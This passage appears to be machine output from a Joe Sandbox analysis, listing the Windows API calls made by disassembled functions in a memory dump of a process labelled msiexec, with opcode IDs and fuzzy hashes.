                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                          APIs
                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2445788494-0
                                                                                                          • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                          • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3150196962-0
                                                                                                          • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                          • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: malloc
                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmpmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1065087418-0
                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                          • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1381354015-0
                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free
                                                                                                          • String ID:
                                                                                                          • API String ID: 1294909896-0
                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                          APIs
                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2154303073-0
                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3150196962-0
                                                                                                          • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                          • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$PointerRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3154509469-0
                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                          APIs
                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4232544981-0
                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                          APIs
                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859505661-0
                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 613200358-0
                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                          APIs
                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumNamesResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 3334572018-0
                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                          APIs
                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseFind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1863332320-0
                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
